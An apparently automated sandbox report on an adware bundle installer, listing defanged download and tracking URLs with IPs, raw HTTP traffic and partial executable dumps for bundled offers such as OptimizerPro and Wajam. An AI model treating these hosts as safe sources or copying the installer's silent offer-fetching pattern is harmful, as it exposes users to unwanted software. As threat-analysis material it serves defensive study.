hxxp://204.11.56.26/debug/Version/4_0_6_25/Nsis/CopyFiles | |
hxxp://204.11.56.26/debug/Version/4_0_6_25/Nsis/GetParameters | |
hxxp://204.11.56.26/debug/Version/4_0_6_25/Nsis/PreRun | |
hxxp://staticrr.tgusrv.com/test.html | |
hxxp://track.v2.sslsecure1.com/test.html | 204.11.56.26 |
hxxp://Track-903226030.us-west-2.elb.amazonaws.com/test.html | |
hxxp://API-XML-1918203848.us-west-2.elb.amazonaws.com/test.html | |
hxxp://API-XML-1918203848.us-west-2.elb.amazonaws.com/index.php/api/283/google-chrome/291/679/English.xml | |
hxxp://staticrr.tgusrv.com//Dictionaries/English.xml | |
hxxp://betatest.vmn.net/betatest/mystart/mystartTb_5.4.1.4_sambamedia.exe | 66.115.174.144 |
hxxp://cds.c5z6s5a3.hwcdn.net/ba/full/mon/setup.exe | |
hxxp://www.wajam-download.com/download/wajam_download.exe | 54.208.23.129 |
hxxp://dl.softservers.net/111001464/OptimizerPro.exe | 198.20.70.75 |
hxxp://s3-website-us-east-1.amazonaws.com/7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe | |
hxxp://cds.c5z6s5a3.hwcdn.net/21/all/hqv/ca/setup.exe | |
hxxp://staticrr.tgusrv.com//Styles/Templates/e9c1a9ca_Win_A_Banner_DeclineLink.zip | |
hxxp://staticrr.tgusrv.com//Displays/Templates/4934e143_Win_A_Banner-NoLink-DeclineLink.zip | |
hxxp://staticrr.tgusrv.com//Docking/Docking.zip | |
hxxp://staticrr.tgusrv.com//Styles/Softwares/70e7b9d8_mystart.zip | |
hxxp://staticrr.tgusrv.com//Displays/Softwares/222ac0df_display.html | |
hxxp://staticrr.tgusrv.com//Styles/Softwares/844a2c3b_browserapp.zip | |
hxxp://staticrr.tgusrv.com//Displays/Softwares/9103144e_display (1).html | |
hxxp://staticrr.tgusrv.com//Styles/Softwares/67423fe2_wajam.zip | |
hxxp://staticrr.tgusrv.com//Displays/Softwares/1f76ab55_display.html | |
hxxp://staticrr.tgusrv.com//Styles/Softwares/0ba5df4c_optimizerpro2.zip | |
hxxp://staticrr.tgusrv.com//Displays/Softwares/7f3e6cee_display.html | |
hxxp://staticrr.tgusrv.com//Styles/Softwares/e7bf26c3_mypcbackup.zip | |
hxxp://staticrr.tgusrv.com//Displays/Softwares/16220985_display.html | |
hxxp://staticrr.tgusrv.com//Styles/Softwares/06a50625_hq-videopro.zip | |
hxxp://staticrr.tgusrv.com//Displays/Softwares/cb3d709d_display.html | |
hxxp://staticrr.paleokits.net//Displays/Templates/4934e143_Win_A_Banner-NoLink-DeclineLink.zip | 85.12.8.28 |
hxxp://api.v2.sslsecure4.com/index.php/api/283/google-chrome/291/679/English.xml | 54.200.36.178 |
hxxp://api.v2.sslsecure2.com/test.html | 204.11.56.26 |
hxxp://staticrr.paleokits.net//Styles/Softwares/e7bf26c3_mypcbackup.zip | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Displays/Softwares/9103144e_display (1).html | 85.12.8.28 |
hxxp://track.v2.sslsecure3.com/test.html | 204.11.56.26 |
hxxp://api.v2.sslsecure3.com/test.html | 204.11.56.26 |
hxxp://staticrr.paleokits.net//Styles/Softwares/844a2c3b_browserapp.zip | 85.12.8.28 |
hxxp://aff-software.s3-website-us-east-1.amazonaws.com/7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe | 54.231.2.20 |
hxxp://staticrr.paleokits.net//Displays/Softwares/16220985_display.html | 85.12.8.28 |
hxxp://dtrack.sslsecure1.com/debug/Version/4_0_6_25/Nsis/CopyFiles | |
hxxp://staticrr.paleokits.net//Dictionaries/English.xml | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Displays/Softwares/cb3d709d_display.html | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Docking/Docking.zip | 85.12.8.28 |
hxxp://dl.newonlinedemoserv.com/21/all/hqv/ca/setup.exe | 69.16.175.10 |
hxxp://staticrr.paleokits.net//Displays/Softwares/222ac0df_display.html | 85.12.8.28 |
hxxp://staticrr.paleokits.net/test.html | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Styles/Softwares/67423fe2_wajam.zip | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Styles/Templates/e9c1a9ca_Win_A_Banner_DeclineLink.zip | 85.12.8.28 |
hxxp://api.v2.sslsecure1.com/test.html | 204.11.56.26 |
hxxp://staticrr.paleokits.net//Displays/Softwares/7f3e6cee_display.html | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Styles/Softwares/70e7b9d8_mystart.zip | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Styles/Softwares/06a50625_hq-videopro.zip | 85.12.8.28 |
hxxp://staticrr.paleokits.net//Displays/Softwares/1f76ab55_display.html | 85.12.8.28 |
hxxp://api.v2.sslsecure4.com/test.html | 54.200.36.178 |
hxxp://staticrr.paleokits.net//Styles/Softwares/0ba5df4c_optimizerpro2.zip | 85.12.8.28 |
hxxp://track.v2.sslsecure4.com/test.html | 54.186.105.91 |
hxxp://dtrack.sslsecure1.com/debug/Version/4_0_6_25/Nsis/GetParameters | |
hxxp://dl.newonlinedemoserv.com/ba/full/mon/setup.exe | 69.16.175.10 |
hxxp://dtrack.sslsecure1.com/debug/Version/4_0_6_25/Nsis/PreRun | |
hxxp://track.v2.sslsecure2.com/test.html | 204.11.56.26 |
s3.amazonaws.com | 54.231.2.152 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /test.html HTTP/1.1
Host: track.v2.sslsecure1.com
Connection: Close
HTTP/1.0 500 Internal Server Error
Date: Wed, 19 Nov 2014 18:12:22 GMT
Server: Apache
Set-Cookie: vsid=912vr1639663426406766; expires=Mon, 18-Nov-2019 18:12:22 GMT; path=/; domain=track.v2.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
GET /index.php/api/283/google-chrome/291/679/English.xml HTTP/1.1
Accept-Encoding: gzip, deflate,gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: api.v2.sslsecure4.com
Connection: Close
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding: gzip
Content-Type: text/xml; charset=utf-8
Date: Wed, 19 Nov 2014 18:12:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: nginx
Set-Cookie: symfony=s28oriin477t5gh1negh78ijf2; path=/
transfer-encoding: chunked
Connection: Close
GET /download/wajam_download.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: VVV.wajam-download.com
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:41 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 21 May 2014 20:10:53 GMT
ETag: "66d4e-f0c0-4f9ee97e8ed40"
Accept-Ranges: bytes
Content-Length: 61632
Connection: close
Content-Type: application/x-msdos-program
Set-Cookie: APPSESSID=w1|VGzdn|VGzdn; path=/
Cache-control: private
GET /ba/full/mon/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newonlinedemoserv.com
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:31 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1416410780"
Last-Modified: Wed, 19 Nov 2014 15:26:20 GMT
Cache-Control: max-age=836
Content-Length: 11715336
Content-Type: application/x-msdownload
X-HW: 1416420751.dop008.ny2.t,1416420751.cds007.ny2.c
Content-Disposition: attachment; filename="setup.exe"
GET //Displays/Softwares/9103144e_display (1).html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:46 GMT
Content-Type: text/html
Last-Modified: Tue, 01 Jul 2014 09:28:50 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
GET /test.html HTTP/1.1
Host: api.v2.sslsecure3.com
Connection: Close
HTTP/1.0 500 Internal Server Error
Date: Wed, 19 Nov 2014 18:12:24 GMT
Server: Apache
Set-Cookie: vsid=921vr1639663443705083; expires=Mon, 18-Nov-2019 18:12:24 GMT; path=/; domain=api.v2.sslsecure3.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
GET /test.html HTTP/1.1
Host: track.v2.sslsecure3.com
Connection: Close
HTTP/1.0 500 Internal Server Error
Date: Wed, 19 Nov 2014 18:12:23 GMT
Server: Apache
Set-Cookie: vsid=915vr1639663431904681; expires=Mon, 18-Nov-2019 18:12:23 GMT; path=/; domain=track.v2.sslsecure3.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
GET /debug/Version/4_0_6_25/Nsis/GetParameters HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:11:58 GMT
Server: Apache
Set-Cookie: vsid=913vr1639663183724887; expires=Mon, 18-Nov-2019 18:11:58 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<html>..<head><meta name="tids" content="a='471' b='1912' c='sslsecure1.com' d='manual_mapped'" /><title>sslsecure1.com</title>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">..<style type="text/css">../*RESET*/..body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}address,caption,cite,code,dfn,th,var{font-style:normal;font-weight:normal;}ol,ul {list-style:none;}caption,th {text-align:left;}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal;}q:before,q:after{content:'';}abbr,acronym {border:0;}../*COMMON*/...wrapper {text-align: center;}...img {margin:0px; margin-bottom:-11px !important;}...wrapper table { text-align: left; margin: 0 auto; font-family: arial, sans-serif; color: #515151; font-size: 12px;.}...h-list {background: url(hXXp://i2.cdn-image.com/__media__/pics/471/top-nav-bg.gif) repeat-x left top;}...h-list li {display: inline; text-align:left;}...h-list li strong {color: #358a35;}..h2 {color: #63ad63; font-size: 14px; font-weight: bold;}../*HEADER*/..#header {border-top: 4px solid #358a35; padding-top: 8px;}..#header .cufondiv h1 a {...color: #63ad63;...font-weight: bold;...font-size: 35px;...text-decoration: none;...font-family: "ChunkFive", arial, serif;...font-weight:bold;...}..#header .normalfondiv h1 a
<<< skipped >>>
GET /test.html HTTP/1.1
Host: staticrr.paleokits.net
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
8..correct...0..
GET /test.html HTTP/1.1
Host: api.v2.sslsecure4.com
Connection: Close
HTTP/1.1 200 OK
Content-Type: text/html
Date: Wed, 19 Nov 2014 18:12:24 GMT
Server: nginx
Content-Length: 8
Connection: Close
correct...
GET /test.html HTTP/1.1
Host: track.v2.sslsecure2.com
Connection: Close
HTTP/1.0 500 Internal Server Error
Date: Wed, 19 Nov 2014 18:12:22 GMT
Server: Apache
Set-Cookie: vsid=921vr1639663429504924; expires=Mon, 18-Nov-2019 18:12:22 GMT; path=/; domain=track.v2.sslsecure2.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
GET //Styles/Softwares/70e7b9d8_mystart.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:45 GMT
Content-Type: application/zip
Content-Length: 4152
Last-Modified: Tue, 03 Jun 2014 10:06:47 GMT
Connection: close
ETag: "538d9e37-1038"
Accept-Ranges: bytes
GET //Styles/Softwares/e7bf26c3_mypcbackup.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:48 GMT
Content-Type: application/zip
Content-Length: 7774
Last-Modified: Tue, 15 Oct 2013 10:54:23 GMT
Connection: close
ETag: "525d1edf-1e5e"
Accept-Ranges: bytes
GET //Styles/Softwares/0ba5df4c_optimizerpro2.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:47 GMT
Content-Type: application/zip
Content-Length: 65688
Last-Modified: Tue, 08 Jul 2014 14:49:06 GMT
Connection: close
ETag: "53bc04e2-10098"
Accept-Ranges: bytes
GET /test.html HTTP/1.1
Host: api.v2.sslsecure1.com
Connection: Close
HTTP/1.0 500 Internal Server Error
Date: Wed, 19 Nov 2014 18:12:23 GMT
Server: Apache
Set-Cookie: vsid=903vr1639663438121596; expires=Mon, 18-Nov-2019 18:12:23 GMT; path=/; domain=api.v2.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
GET /betatest/mystart/mystartTb_5.4.1.4_sambamedia.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: betatest.vmn.net
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:32 GMT
Server: Apache/1.3.41 (Unix)
Last-Modified: Wed, 04 Jun 2014 14:56:26 GMT
ETag: "8fbd-5362b8-538f339a"
Accept-Ranges: bytes
Content-Length: 5464760
Connection: close
Content-Type: application/octet-stream
<<< skipped >>>
GET //Displays/Templates/4934e143_Win_A_Banner-NoLink-DeclineLink.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:45 GMT
Content-Type: application/zip
Content-Length: 7828
Last-Modified: Mon, 03 Mar 2014 12:56:47 GMT
Connection: close
ETag: "53147c0f-1e94"
Accept-Ranges: bytes
<<< skipped >>>
GET //Displays/Softwares/16220985_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:48 GMT
Content-Type: text/html
Last-Modified: Thu, 03 Oct 2013 10:28:07 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
<<< skipped >>>
GET //Styles/Softwares/844a2c3b_browserapp.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:46 GMT
Content-Type: application/zip
Content-Length: 734
Last-Modified: Tue, 01 Jul 2014 09:26:57 GMT
Connection: close
ETag: "53b27ee1-2de"
Accept-Ranges: bytes
GET //Displays/Softwares/222ac0df_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:46 GMT
Content-Type: text/html
Last-Modified: Tue, 03 Jun 2014 10:09:14 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
<<< skipped >>>
GET //Dictionaries/English.xml HTTP/1.1
Host: staticrr.paleokits.net
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:31 GMT
Content-Type: text/xml
Content-Length: 626
Last-Modified: Fri, 12 Apr 2013 09:51:55 GMT
Connection: close
ETag: "5167d93b-272"
Accept-Ranges: bytes
<dictionary>
 <installed> Installed </installed>
 <installing>Installing</installing>
 <installingetc>Installing...</installingetc>
 <downloadError>An Error has occurred</downloadError>
 <takeFewMinutes>It may take a few seconds</takeFewMinutes>
 <confirmExit>Are you sure you want to exit?</confirmExit>
 <installClose>Do you want to install the remaining offers?</installClose>
 <welcome>Welcome</welcome>
 <license>Welcome</license>
 <options>Additional Options</options>
 <instalando>Installing</instalando>
 <finish>Finished</finish>
 <downloadingetc>Downloading...</downloadingetc>
</dictionary>
GET //Displays/Softwares/7f3e6cee_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:48 GMT
Content-Type: text/html
Last-Modified: Tue, 08 Jul 2014 14:47:05 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
<<< skipped >>>
GET /debug/Version/4_0_6_25/Nsis/PreRun HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:08 GMT
Server: Apache
Set-Cookie: vsid=905vr1639663281509643; expires=Mon, 18-Nov-2019 18:12:08 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<<< skipped >>>
GET /7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: aff-software.s3-website-us-east-1.amazonaws.com
Connection: Close
HTTP/1.1 200 OK
x-amz-id-2: wgcmSekBETb0nbN+v9J08dVMcyPuhtEsezW2SLhqp02ifjh15UxVtFK2K2hYd4QEZOG7TnT3oR0=
x-amz-request-id: 02EFF118D334B900
Date: Wed, 19 Nov 2014 18:12:43 GMT
Last-Modified: Tue, 08 Jul 2014 14:34:06 GMT
ETag: "af37247590f4e4b8a8a214a091ea6067"
Content-Type: application/octet-stream
Content-Length: 73816
Server: AmazonS3
<<< skipped >>>
GET /ba/full/mon/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newonlinedemoserv.com
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:31 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1416410780"
Last-Modified: Wed, 19 Nov 2014 15:26:20 GMT
Cache-Control: max-age=836
Content-Length: 11715336
Content-Type: application/x-msdownload
X-HW: 1416420751.dop005.ny2.t,1416420751.cds007.ny2.c
Content-Disposition: attachment; filename="setup.exe"
<<< skipped >>>
GET //Styles/Softwares/06a50625_hq-videopro.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:49 GMT
Content-Type: application/zip
Content-Length: 725
Last-Modified: Wed, 12 Feb 2014 17:09:57 GMT
Connection: close
ETag: "52fbaae5-2d5"
Accept-Ranges: bytes
GET /21/all/hqv/ca/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newonlinedemoserv.com
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:41 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1416403573"
Last-Modified: Wed, 19 Nov 2014 13:26:13 GMT
Cache-Control: max-age=1065
Content-Length: 12531440
Content-Type: application/x-msdownload
X-HW: 1416420761.dop005.ny2.t,1416420761.cds045.ny2.c
Content-Disposition: attachment; filename="setup.exe"
<<< skipped >>>
GET //Displays/Softwares/cb3d709d_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:49 GMT
Content-Type: text/html
Last-Modified: Wed, 12 Feb 2014 17:10:19 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
<<< skipped >>>
GET /test.html HTTP/1.1
Host: track.v2.sslsecure4.com
Connection: Close
HTTP/1.1 200 OK
Content-Type: text/html
Date: Wed, 19 Nov 2014 18:12:23 GMT
Server: nginx
Content-Length: 8
Connection: Close
correct...
GET /111001464/OptimizerPro.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.softservers.net
Connection: Close
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Wed, 19 Nov 2014 18:08:49 GMT
Content-Type: application/octet-stream
Content-Length: 6160376
Last-Modified: Wed, 19 Nov 2014 16:07:25 GMT
Connection: close
ETag: "546cc03d-5dfff8"
Content-Disposition: attachment; filename=OptimizerPro.exe
<<< skipped >>>
GET /debug/Version/4_0_6_25/Nsis/CopyFiles HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:11:57 GMT
Server: Apache
Set-Cookie: vsid=922vr1639663172813827; expires=Mon, 18-Nov-2019 18:11:57 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<<< skipped >>>
GET //Styles/Templates/e9c1a9ca_Win_A_Banner_DeclineLink.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate,gzip, deflate
Host: staticrr.paleokits.net
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:44 GMT
Content-Type: application/zip
Content-Length: 344899
Last-Modified: Fri, 07 Mar 2014 11:17:00 GMT
Connection: close
ETag: "5319aaac-54343"
Accept-Ranges: bytes
<<< skipped >>>
GET /21/all/hqv/ca/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newonlinedemoserv.com
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:41 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1416403573"
Last-Modified: Wed, 19 Nov 2014 13:26:13 GMT
Cache-Control: max-age=1065
Content-Length: 12531440
Content-Type: application/x-msdownload
X-HW: 1416420761.dop002.ny2.t,1416420761.cds045.ny2.c
Content-Disposition: attachment; filename="setup.exe"
<<< skipped >>>
GET /betatest/mystart/mystartTb_5.4.1.4_sambamedia.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: betatest.vmn.net
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:32 GMT
Server: Apache/1.3.41 (Unix)
Last-Modified: Wed, 04 Jun 2014 14:56:26 GMT
ETag: "8fbd-5362b8-538f339a"
Accept-Ranges: bytes
Content-Length: 5464760
Connection: close
Content-Type: application/octet-stream
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................@........S......................................s..........hI...........KS..............................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...hI.......J...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /download/wajam_download.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: VVV.wajam-download.com
Connection: Close
HTTP/1.1 200 OK
Date: Wed, 19 Nov 2014 18:12:41 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 21 May 2014 20:10:51 GMT
ETag: "7015d-f0c0-4f9ee97ca68c0"
Accept-Ranges: bytes
Content-Length: 61632
Connection: close
Content-Type: application/x-msdos-program
Set-Cookie: APPSESSID=w2|VGzdn|VGzdn; path=/
Cache-control: private
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@..................................`..............................................................P...p............................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata...0...p...........................rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET //Displays/Softwares/1f76ab55_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Nov 2014 18:12:47 GMT
Content-Type: text/html
Last-Modified: Thu, 17 Jul 2014 09:13:47 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
